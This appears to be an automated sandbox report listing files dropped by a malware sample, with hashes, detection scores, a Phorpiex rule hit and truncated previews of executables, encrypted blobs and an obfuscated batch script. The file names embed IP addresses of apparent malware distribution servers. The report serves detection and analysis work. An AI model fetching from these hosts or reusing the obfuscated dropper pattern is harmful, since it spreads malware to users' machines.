Preview:	..0"Vb...j...2.h.>...Q.9.B......l.n}...:M.n.0.Hy..u.n?.....Y{..-.\|.......nS2..J1O.P..x!A..hh...t....;=..........\.Y'..V.\|.UYnG...p.eH.........6t..q'J..=1...7N.gf]........F..xky..P...Vc..:...,.z..pj.!.F1..........x.G.B....1....,....s..g...A...J.1....`t.1.e#.i.r..........y..X.l....f......t.K.ND.....)[....(.^..4.c........P.kK.3.....d..C,R.n........H..............XqXuL.R.Q.......-....20..~%.X.B..,....MB...\.....^..A.sj..ybC....1....y.P...?+.n....$.....M.e9...;..~..O. ...L.s...E.V....Q..........S.O..q%w.o..P.V....u..#.]4...hoq.......R..b... ..."d.IkZ....h..)t9.j]......,..C.xo.....x.{..i..#)Ni.T._AG..4.AGX.SmO1..8......5[.q.0.W..'.8B.?..G./@V.F.o..b.....4..]e].....R.K.xm.x.....C...?.:$....2.z6A).GES...hsWI'.C3gp".P.i.TZ...Q...1...E{oM..vJT..dt.....B('.R.<.c.+........&s:.....e..qd6....G.I.....n.:tn@..o((.Z_.a]......X...H..G.cX..........`..\.&&J\|..3E=8..Bh0m.fU.&i.6.#...xi.....NtF"#..8."X.....\.r.9.....a] J`..J...`.!!$....6.w.9...s3C.v...%..]'2

C:\Users\user\AppData\Local\Temp\Connection

Download File

Process:	C:\Users\user\Desktop\http77.105.161.194file1.exe.exe
File Type:	data
Category:	dropped
Size (bytes):	52224
Entropy (8bit):	7.996664736883899
Encrypted:	true
SSDEEP:	768:dUTSDydsRK+pG7mdPmJggMMkN3JF7aACtQ+U3BDOe4OhgvONSv+68gnHQ/4+:dUmDwWK+phUO3HHL3BjTgfv+68gnHQQ+
MD5:	B6B68A11D199C97C897A262D3314A9ED
SHA1:	07B63697EBDFDCD1910390B43477562DBC150355
SHA-256:	4A1C8403F1325713242C06529510EA73E88590760D20D836D7BA987586E99613
SHA-512:	70B79CE0E9EF278974576136BEBF706646F6D7412B5C1EEB6AB9131ECD7B33621F2382009DC59758EA257F865B425E83C10E1FE2DB52173D48D3923EE3821415
Malicious:	false
Preview:	$...g:Ltp..#.7...jxh..e~.....<#...K.......}..T-.M...\|0@...pr.V.......Y......eh..&D....u.z;.n...4.UU....k.......f.....6....dV..U.9.n..........,...8.H.f...+ZY..(.* .C.G..%j$.y@J(.N7...a..1M2.H.\....R..A3.fM...B>..H.....^wS..Y=..;....E._..uW.J0@.[....4.7...K...... ..\.....g..r..k...2.!..u.'....).%h....[...>C.......m..j..h9....~\|.......1P..d}2(.$v.$X..c`&..Q.q'..eh....z.hd....CO,r....*F.1.%1..o.H.......T)l.....X...J.`......o...AG..a.......L$.0+..\|G.. ...zA.w3..w".e.....1...Q.-..l..w?A.....Q1......_..v.v.........c.&..:Y.f.......4v/]..+fo.y...M.^.,....bX..V...}.%1....&r.x..L.v..../'u.h..wnR..;.DX.oLh.u...4.A^.>..3..m.Mmr.........S....bc.%...$.b....-....K.....d.H.:g...G....A2q.1.E+-Nu>....d;p.9....Ap...W.n.....pv.y4p?..e...V.R.D....@V.5.....).Li.+.h.8....\|Hj.?..rfn.it....O....!.E~.e.. ..c>)..:...8..c;R.Z1....n...XlMD]~e6...:+..@8....;....G.-...b..wd1.2.L.I...u.})......./.aL.95..\|.Y,..;G.s.)>..u.d...M...:R...?}...]<..C"..0..Ak...Q.'..........%.

C:\Users\user\AppData\Local\Temp\Href

Download File

Process:	C:\Users\user\Desktop\http77.105.161.194file1.exe.exe
File Type:	data
Category:	dropped
Size (bytes):	99328
Entropy (8bit):	7.998237230122635
Encrypted:	true
SSDEEP:	1536:iIofhYfMIH6MRThRDL2NgT+zGv1wcT8xTSYHhkAs+zi8L8ZIsuBH5lrZIAti4:NofhZeDLDL2muG+Az2zco/lNi4
MD5:	39904F7826116996701E702069A0CA0D
SHA1:	5B0133CA89160AC7F4805F4B054337A985086F69
SHA-256:	5BA66A80E757C3A7CF2E16E709090FCBE8F8019E70C4266FD957CE4878B8719A
SHA-512:	C67407D641B9CDA3EE41778DDAE04566853C1E9D99D89C3E8BEB54C27B68BFBE39DA7D632ACFC5ACE72941C7C0B94C57CD08F732C5DCB4A4A845F8DA5A94E569
Malicious:	false
Preview:	.G.).z.p..W(z.c7MBW.......FME..V.[GsM;?.U9!#....d.Rc.-...Mm:B.....w.1...&...U....p.F.3c.0.Qj,...G..D....l.K.......w.....1..z'..,...0..99.^......qG.....'..N/.U8....n..N....A.....wt.Y....f...Q.....)...U..L....N^.f.Fa.>.....Z\...\|..}..v\..xu"n..Z.C...N,...xE..................8rkS..`..J.l...\P\.@v.<.d.[........q5..X.`{...z%d.f...O...-....A.d...N+O..x.d.&/..H.....9k.)..)&...w.B..\|.......T....+.l.IIh.C.6`...w.......\|]gX#...L.)..a\|p.Y.G.y.;...):;..r5....!...)$Z...L..;...x.;..p..(.[i..m..N..o..w'7.xD4<..SL.\...V.....$Mu..T..g...&...9..O.\|../.2..6i....).29.0.Lag.Cbt..Rb...I?$.M8"kj.lB.%......_W.?.?..B..&p..D..R.~.p.fE........'[%]..t...0..ma&.)!k...l.9\..N......M..i.3n.@UKd.f0bd(......$.Ud0.t@..Y.c..r......[..WW.....on...;..fs..j..j....r".....W].}..._7{[*.........4TA..o(SC6.y{.F...W7 .rj..\|.sO....k.......?.N.3....F..xY).....v.k.)k...:.....[5.."@..9..4......,....A...h..{l....;...)Y...tW.T...1]..$])....0......GK.q.aI....-d.{FW&....[...G.ga}.D...4U.

C:\Users\user\AppData\Local\Temp\Humans

Download File

Process:	C:\Users\user\Desktop\http77.105.161.194file1.exe.exe
File Type:	data
Category:	dropped
Size (bytes):	93184
Entropy (8bit):	7.997850706725241
Encrypted:	true
SSDEEP:	1536:39Xh+SUhO1fn9CX1fJRrPYE2f+H+3Kayivh6Ys445ToLaaDLRHfbQCHX:9hBUhO1fMRrPYE2f+Hl+h6rDdaPRzQSX
MD5:	82B096504036D6C23531DB83A3DBC2BB
SHA1:	6747CC73044ADA91759EDFCC19206038DD5AF327
SHA-256:	53744685D58B788EC091EB57FA850ED1A78C17B80EE1BA21796D6533E4C07CD0
SHA-512:	F5F1819FDDCF159B5E60972741A3E270C9A26B41EE4220739AA381A09264ED4D7F9E5D4FE18DF4D066850C241A20BAF638F163EF8992BC917B9B86B043BA31F0
Malicious:	false
Preview:	..$....1....#+.I.o..c....,m.g.o..:.!.......}.7u....s......K......o.&.7A..........mb4:U....b..e.....p.h.N.0...u.(h....W.vl,.._?..K..,0i.j...wM.....x...v...U!...8.....3...f.b.........xGd.......y.2........[\|. .jy.w\|6y+&....;/.k...N.....I.L.....e......x....T.Ax:P..I..j........B..P.6.{.... ..w.i........g8..$.N.V.....o...Q..h..M.8_tO'.L..+n.b(..m=&GWn#.2..F.9.g.A..5.{....J.(Qa={x.... .......8..C.J..C..).i~..uZ.8iw.t.?.x....,].w....(.x....F....3....V!.@,I...P..n.k.<.uC...;b...-c$s...ho......kB{...E...,[..........H.Nw....yt!......V...l')1!...cw.,bJ.....7$*.1K.Vz..r...f{3.t.m#. .<.[t..J.=&..K.....l......r.2.?..]S....w..>.J.0B..u...t..Z............i..[hz.N.6.5c....,.18......)".YM..e...&...1[...JMr........f...T).Q......R.F.f.......{...C./.......9@\.ow.;.Y.......+..p.N...Mp.....;.%.h.....!j.5..Y....._.,.......WC?.C....~.........wF;&...f.(D.B...h...U....%mVaWe........M.]cx..6_q.F.a..B..j..>W.%NNJ<.Gb,./?.Ww....h#.+..m...l..i..]...7...<...B.i.<}.u....sJ

C:\Users\user\AppData\Local\Temp\Profession

Download File

Process:	C:\Users\user\Desktop\http77.105.161.194file1.exe.exe
File Type:	data
Category:	dropped
Size (bytes):	7122
Entropy (8bit):	6.207053256897908
Encrypted:	false
SSDEEP:	192:dHAeOqAFDw09CV/2nPvj6DdMP3r1HI5jMlbNt:dHAHhww+/2nlP3r1WAT
MD5:	6095CC0E5110BFBF129B695533148CF3
SHA1:	4DFD2F248E726DC1357F15B16B80A1AB71F3A46E
SHA-256:	A354428E5BE2519AA3DB2ABED313D510AE754DDF052C38F405235BDC73C2C630
SHA-512:	AE6307FA1B327D34A56E80E40412E6557746FC6EC3EE7A7E7040B8BE8826016B78E77C77B5041888C92AD1EE0B760B3CCD7D2F6D3BF66C0D577AA936D98170F1
Malicious:	false
Preview:	navyfurthermoreacceptableinvestigator..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Represent

Download File

Process:	C:\Users\user\Desktop\http77.105.161.194file1.exe.exe
File Type:	data
Category:	dropped
Size (bytes):	67584
Entropy (8bit):	7.997370661710925
Encrypted:	true
SSDEEP:	1536:uACIpQQTQhsU1zyOQ6CSNKjROvdpONM1sOVzLv4:mIpxTBU1kvjQ2Mfn4
MD5:	09CAFC2CD2586F5BFAB33937D069B114
SHA1:	C7303FEB233867E8DEEDEC7003347DFE90701F0B
SHA-256:	5B31062934D1AFE4E887B181CC0F2ADD523465A63F710333824102749AE2A768
SHA-512:	5AB63BFCA3AACE35117DD4013B44FF9EC8EDF8C9DFA79481ED3F8B2B5790AEC3B01B512286A52EFF7C8C210DE7BF3093274289C10A3BE0EF74D51F2E399D80F3
Malicious:	false
Preview:	..~.h\|#..#.....Y..FW.5..R;.p..l....>;Yx.u..Y.]..H...(....!....._s.g...n...,+....6..N..rr.n..b.N]. 0..............5.i..6.m.U.k..D.D8..v....;....e.7..I.. %..4c..Uk..#.....H..W.\|u.. ..W.@C.....W....w(.o.,.y.D3U.%.N..t8.\|?&..d..:3.ur\|3.....S.....)u./Q-..9..E$S..]+C......V&/...zm....5. ....1............F.C...pz......^...C7.... ..M.....lr9.....F...b...Qz.!5.].."..... q.eL.Zj/.o.y/.....8....&.......+..4v..4}1....(..@^<......c..`KV_O'..U]....1u..Z}....L..T........c....$=5'.k.#j3....j.).+.'.\|....Ux^'..Y3#..Tq..Y.}.E.k.t.<g..F.pxhH..b.].J...=..J]?X<.jrE....k1N...PN.b.Y.C..u.f.............h~.H,....\|. .G.5.5.u..6]...F4..:6...y._.{d..6..1.KV,.=.2...ru.....&e......ua+!6....)..\|.r;H2..Q...c(.....,9.e..E[...ML?...!k~...Xf..b..H...........op....M...1xh'.P...r...L. .?.A.A.....k......$..5U..S......-7...D.Q.6..x.%.k>..Q/..r0.&.F7Qn....>....Y.'..W:I....s4.){..B%A.\'..F../.x.7.%...0W..........e..G....Y.k....>..9}....5.C.^B..C.....j...P.6..'.....@..

C:\Users\user\AppData\Local\Temp\Router

Download File

Process:	C:\Users\user\Desktop\http77.105.161.194file1.exe.exe
File Type:	data
Category:	dropped
Size (bytes):	79872
Entropy (8bit):	7.997788847113242
Encrypted:	true
SSDEEP:	1536:QFZrVBHBTNIDho7gnJOFVE26So8If1jtdAZQyd1uYXomo5dyf5YEEQ:QJBHBSdo7gnKVEPSKdAaO1uYXoEaEr
MD5:	44D0F8F9C4B06736E9063432C40AD468
SHA1:	79396180851FBA1D3B611603455D61798574891D
SHA-256:	DF754244594BAB7D25764CA6DF24DC7E19D3D6EB8AB29A575B665C8559F6EF78
SHA-512:	DFCFA10FB7017638889593CB7C2C7BC9D43564978F4EB05C68D49E1DBBA820335B0C115A91B88011A83EEE1ADEE0C9E4CF7900F575DCF696A079941BB7E96EB2
Malicious:	false
Preview:	.X..;.(k.\.\Di...M).7o.S.._......W.m.{..K.}...D=.....Grp.zi...8...6......X..7."w;.....6...+.4@A5r.)...L.j.-j....T..k..u.....{.U.5..k!...M.?..Cu..Q.\|........q...".!..........9v...\|..f.-..m...e..QC...OxB.YP....[...)A..5....Jn.L..O.9.8rh...:geF'.t@.H0..Ag...>..c7q.AG.........D1..Y.c.-.W.8....TYT.._..M....R.3#b&.{..V.$H.l......{f.R..M.k#4 \.,b.6..j&...d....a..,.,.0..B.7.t7....M....s........Wr...h>z.Q.....$.!..Jjs.6..<....P.$.C ....Y..%....;..Q.3.p.}...F.....2ul..&...E..<.Q......Z.W.3..1..!.1..T.B.G..<..EYu...V..#..,...1.}....f\....C..2.'/.....D.y.....iK.s..5`.^PUn(SE1E.....%.Z.(M.[..iL..s.MI.7.bp...H...0..s.gc.K.!(.w. ..f.zHV}...#V......1......<#.Nq.".+_...+.`..%.'T}!...OE=...NL.)W,hy...R..A......7\HN...+..n.$.a7.v"R...5.d.+a$CI.~!v.....8.r..US.cn.......^....x.............o.x.dO.{......]...........G......C~WBx.5E...l.$P..[...s/..=.,.).c...p..._.u...zd..k_..,.!.j.)..N.3..j.'...WE...*.uBr...L.W.@..OU?Z...SP..Jx.4.uqe...58...B.1...^...L.-YM

C:\Users\user\AppData\Local\Temp\Sol

Download File

Process:	C:\Users\user\Desktop\http77.105.161.194file1.exe.exe
File Type:	data
Category:	dropped
Size (bytes):	30822
Entropy (8bit):	7.993329836694369
Encrypted:	true
SSDEEP:	384:mbAkiZzvHEtuS2S77HZGZzkhmqosfpk/CYJ9w3zC79LGoireZXGPYk4mJWVBdep/:THAh9zRmDsBSNJ9KzCA62PYka6V6O
MD5:	CAEFB3C36D5BD6C6923EA3C264F76DE7
SHA1:	4554ACB578278BBB2C4DB326960E49736C968459
SHA-256:	38206815F4EA33415C17F1C5E6EC111CBCFF8F31B4EBF1F16B2CAF3E0E9F3EE3
SHA-512:	97F7F9DE8ECBD47C576745FCEE926C70B72610C4AE535452C2B22C595DE9B9B401D6ED74D5A13A9E4E9FD09291C3512401B9B3E2C638716BB37EF4030E5D4F4B
Malicious:	false
Preview:	u.V.......yPo9.M.8.f.!.[.F...9...p...F.Y?.bz.4.N[U...3.......x.X(.j\A.<.N.P..,^O;Gu.N..P.s.r...{.}...._u....E..,.+..[z.l.j.Q&4e....AU..Syw.m.....Z.ny/..........Ex..=M.b..<M.3CIV.R.m...k.h.X.5..W.=d_.>..Ki7A8.!..qx.~.j.s..>...V.\|..Z....$.C-.qj...m.D]..KXg....A...<....^.\%...[.h4.....5.....).!.k...Q.J.=...D.i...X.s...j..fe.v.x.F\|..x[..m..n5.}O..HX3...[....cf.CD........?[...y.j..K..8.......W.(.C.%'.v...=...9......'...np.fL.0...Xz..(.....-...>T4..x.o....DQ.. .DO.....pu....P...n...x.9...j.h...',.../..o...".1.~.0<0x..s$=t......[..._I\.a....+.{6......)-[.>..N..m..x..,.y2..B..\|\.E..<.f...Z.;2H...).y......=R.^..HLnp....YJ8...%..@..%.&.....Z}D49.m,.]..9-.D....p.~...........0.6.A......1.d......-.n.!^.....@!.....@=.s7>..%.A..F.Q...V.Uu..g..._..].....K..AC..^.@.l...6U.....D..e.UX...x#q)A..........._?......."..lia..d@..#Uw.......r...z.(.....r^:..V.....y. .i...@.......72.u....Ba....h..v"}.......C.D_.G.,.@e...E~.Q.].7..).@;..'..P.r.U./..\|$D....&<..*

C:\Users\user\AppData\Local\Temp\Tits

Download File

Process:	C:\Users\user\Desktop\http77.105.161.194file1.exe.exe
File Type:	ASCII text, with very long lines (983), with CRLF line terminators
Category:	dropped
Size (bytes):	20664
Entropy (8bit):	5.04157152287341
Encrypted:	false
SSDEEP:	384:D271Mg7Bi7MmXkjuAJ9Eh9J1TdO4VyzfhGF9jzG+20XRQ1hQHTu+3pBJtXonJ:D25XB2fQuIKXAUyzfhGF9jzG+PXRQ1SS
MD5:	1A43009615B399C7DA8FC4748BD7149D
SHA1:	4A118C8B399B92D7812D715B588F049B37EFD6D2
SHA-256:	AFCD2CDC62A903F0CB91C678BC8F9E6A0022A06AE6CE4BB25EDF3D6886FF7165
SHA-512:	01313DCBCD37FC4F7C492CEEDAF4C57C58CB2478E4C3D7510435B8CA8E3B3B55D879B216F0A2BD15E8A487D6AECC0CD2F805CBA993EAA0F278DFA6CAB90599ED
Malicious:	false
Preview:	Set Opera=O..YqsBoolean Dreams Featuring Buildings Widely Requirements Fails Hire ..PMZXRecordings Bottles ..pjJuXnxx Responded Statewide ..nVQRobot Leisure Virtue Bedford Producer Apr Tactics Trial ..agbOl Food Ad Score ..gOScott Sake Penny Provision Screening ..EgEdt Hostels Nt Ballet Agent De ..TcDas Annually Play Theater Handmade Plasma Syndication ..xRDOptical Amd Farmer ..MfzVElementary Paying Terry Ass Streams Sri Freelance ..Set Britannica=j..qtKValves Enemy Affairs Securely Parents See ..LulColony ..kxuBasically ..SNHGuitars Nbc Attractive Alignment Te ..DMFinest ..jsrgSeniors Frequently Neck Congratulations Supposed ..vwNHHost Ultra Pursuit Steel Societies ..SGMonaco Ro ..Set Siemens=B..lHmCCertain ..WIProposals Trip ..WjhmRacial Moore Laden Im Mauritius Recorded Occasions ..PnulGrams Failure ..fRRealistic Proxy Possess Hundred Privileges Coordinated ..cYjyAffiliation Blackberry Pig Thing Neighbors Duck Reynolds ..Set Weblogs=I..ThEhChoir ..tgArabic ..vzxrBios Drugs Awesome A

C:\Users\user\AppData\Local\Temp\Tits.bat (copy)

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (983), with CRLF line terminators
Category:	dropped
Size (bytes):	20664
Entropy (8bit):	5.04157152287341
Encrypted:	false
SSDEEP:	384:D271Mg7Bi7MmXkjuAJ9Eh9J1TdO4VyzfhGF9jzG+20XRQ1hQHTu+3pBJtXonJ:D25XB2fQuIKXAUyzfhGF9jzG+PXRQ1SS
MD5:	1A43009615B399C7DA8FC4748BD7149D
SHA1:	4A118C8B399B92D7812D715B588F049B37EFD6D2
SHA-256:	AFCD2CDC62A903F0CB91C678BC8F9E6A0022A06AE6CE4BB25EDF3D6886FF7165
SHA-512:	01313DCBCD37FC4F7C492CEEDAF4C57C58CB2478E4C3D7510435B8CA8E3B3B55D879B216F0A2BD15E8A487D6AECC0CD2F805CBA993EAA0F278DFA6CAB90599ED
Malicious:	false
Preview:	Set Opera=O..YqsBoolean Dreams Featuring Buildings Widely Requirements Fails Hire ..PMZXRecordings Bottles ..pjJuXnxx Responded Statewide ..nVQRobot Leisure Virtue Bedford Producer Apr Tactics Trial ..agbOl Food Ad Score ..gOScott Sake Penny Provision Screening ..EgEdt Hostels Nt Ballet Agent De ..TcDas Annually Play Theater Handmade Plasma Syndication ..xRDOptical Amd Farmer ..MfzVElementary Paying Terry Ass Streams Sri Freelance ..Set Britannica=j..qtKValves Enemy Affairs Securely Parents See ..LulColony ..kxuBasically ..SNHGuitars Nbc Attractive Alignment Te ..DMFinest ..jsrgSeniors Frequently Neck Congratulations Supposed ..vwNHHost Ultra Pursuit Steel Societies ..SGMonaco Ro ..Set Siemens=B..lHmCCertain ..WIProposals Trip ..WjhmRacial Moore Laden Im Mauritius Recorded Occasions ..PnulGrams Failure ..fRRealistic Proxy Possess Hundred Privileges Coordinated ..cYjyAffiliation Blackberry Pig Thing Neighbors Duck Reynolds ..Set Weblogs=I..ThEhChoir ..tgArabic ..vzxrBios Drugs Awesome A

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bxwukzf3.vhi.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pmno1bnd.e0f.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rit4ekw5.yjk.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zcmeh1gf.zxo.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\delays.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ISO-8859 text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	1048575
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:T/b7:j
MD5:	32F5DDCCF844B8F5F35CDFB121D959FF
SHA1:	B807EC8A01A090AB3B66EB111B80BF47C26F0CA5
SHA-256:	782D9A3FA408788D3C0DDE4EBD301DF68948DC4CEE354692D95127CA591814AA
SHA-512:	5A013EB5D7CF5603F40C68C070D939529945ABA92FD0321AEE7C96C91FE0007729433CFEAA874E6536C6371C749F3AC101FC6908AF30BB8357BE3078439C89B2
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe

Download File

Process:	C:\Users\user\Desktop\bomb.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	814592
Entropy (8bit):	6.983754252458084
Encrypted:	false
SSDEEP:	24576:8LjnovUhA5LneNpuiNkPl4pYYZcfdkw7Yhw7ij3S:OovUhApne/NkPl4pYYZcfd37YRC
MD5:	FCFFB8B429A1BD3DEB45AA076909C6B8
SHA1:	C01B1C86DE3DEF0ED681796A03E1764275E8E13E
SHA-256:	97AF0DC504185E8E7BF67EC8B31B7D14A595A6874EBC250982D9359A1D8669B2
SHA-512:	639FE782C041B52225B44AC93676B0A63643A35F2CA8745E4F4A84CC33C7FBC64150F37E08704AA1FC291AC497C0ADC65CEEDEF7195D931E805B143D606933F7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 45%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Dt.f..............0.............N.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...T.... ...................... ..`.rsrc...............................@..@.reloc...............l..............@..B................0.......H.......4\...S......g.......9...........................................jr...p.(....(......@(....&2. ....o....^.o....~.....o....u....v.o......(...."...B"...Bo ...J.~!....s"...o#..."..o$...2.~%...o$.......0...........o&...9.....o....9.......o....%-..o....+...-..o&...+..o........o~......o....o'...o.....o......&..o....o......o.....o~...o(...Xo....+...o)...o......o)...o.....o........0..A............+..o....o+......o(...,#..2...o.....o(...o,.....o-...o....*r.o(...,...

C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe

Download File

Process:	C:\Users\user\Desktop\bomb.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	6.300629641809532
Encrypted:	false
SSDEEP:	1536:y7zFjdFmav82XA3I9XRH5McIu9Xh0TRvfQaQG9MF7vnn:uRyOPA3MfCwR0toZF7vn
MD5:	930C41BC0C20865AF61A95BCF0C3B289
SHA1:	CECF37C3B6C76D9A79DD2A97CFC518621A6AC924
SHA-256:	1F2E9724DFB091059AE16C305601E21D64B5308DF76DDEF6B394573E576EF1FF
SHA-512:	FA1F33C71DA608B3980038981220FCEBEE0B0CC44331E52F5198DD2761C97631EE8286756C2CC16245A1370C83BB53CC8EA8EF64E0FCDD30AF51F023973986B2
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L......g............................@y............@.........................................................................\|0.......................................................................................................................text............................... ..`.rdata...?.......@..................@..@.data...H_...@...N...2..............@...................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\http185.215.113.66pei.exe.exe

Download File

Process:	C:\Users\user\Desktop\bomb.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	5.254547230411213
Encrypted:	false
SSDEEP:	96:zMn7AN23D0TXraYgnY1dTNDiIp+BYA8vrcVO15uJxGE9YUBz2qh3C7tCEkC:A7ANUYhUYPtp+OFMJxTmUBzthckC
MD5:	8D8E6C7952A9DC7C0C73911C4DBC5518
SHA1:	9098DA03B33B2C822065B49D5220359C275D5E94
SHA-256:	FEB4C3AE4566F0ACBB9E0F55417B61FEFD89DC50A4E684DF780813FB01D61278
SHA-512:	91A573843C28DD32A9F31A60BA977F9A3D4BB19FFD1B7254333E09BCECEF348C1B3220A348EBB2CB08EDB57D56CB7737F026519DA52199C9DC62C10AEA236645
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......gd.##.`p#.`p#.`p}.p!.`p}.p".`p}.p6.`p...p(.`p#.ap..`p}.p .`p*}.p".`pRich#.`p................PE..L.....Df..................................... ....@..........................`......?.....@.................................l$.......@.......................P.......................................#..@............ ...............................text...z........................... ..`.rdata..4.... ......................@..@.data........0......................@....rsrc........@....... ..............@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\http77.105.161.194file1.exe.exe

Download File

Process:	C:\Users\user\Desktop\bomb.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1161840
Entropy (8bit):	7.895661659092417
Encrypted:	false
SSDEEP:	24576:s9y5ZBrOwXMFjy47F710L+O0WK2h4xsPxdUn6d9dZiffX6j76oy4cXW:skjrOaM97F71tbWK2h1Px06fdqCja4mW
MD5:	774C8215DA3CB73644D36CA3F60E676B
SHA1:	375F9C6D12374F17CD8F483C565015171B988E49
SHA-256:	AD123B1589CB2C726DE8DA9AF56EC2DACC22518CDA285DC3C014C65C4D405A1D
SHA-512:	CEFF4E53BDD23CE784BE45B6FFA5598F01EDAF16A800BA5FE1367B2FCC29DE943D5CAB9D40123AC9FC61677749B9C8B2EFECB3624F05D285097BD6DC0E901207
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 13%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......aKZe%46%46%46,R.6&46,R.6446%56.46>..6+46>..6$46>..6$46Rich%46........PE..L.....GO.................p....>..B...8............@..........................pH.....n.....@.................................4........0G.......................?.H....................................................................................text....o.......p.................. ..`.rdata..b.......,...t..............@..@.data....f>.........................@....ndata....... ?..........................rsrc........0G.....................@..@.reloc...2...0H..4..................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\http77.105.161.194filecarrier_ratecon.exe.exe

Download File

Process:	C:\Users\user\Desktop\bomb.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	51646576
Entropy (8bit):	7.977900319490949
Encrypted:	false
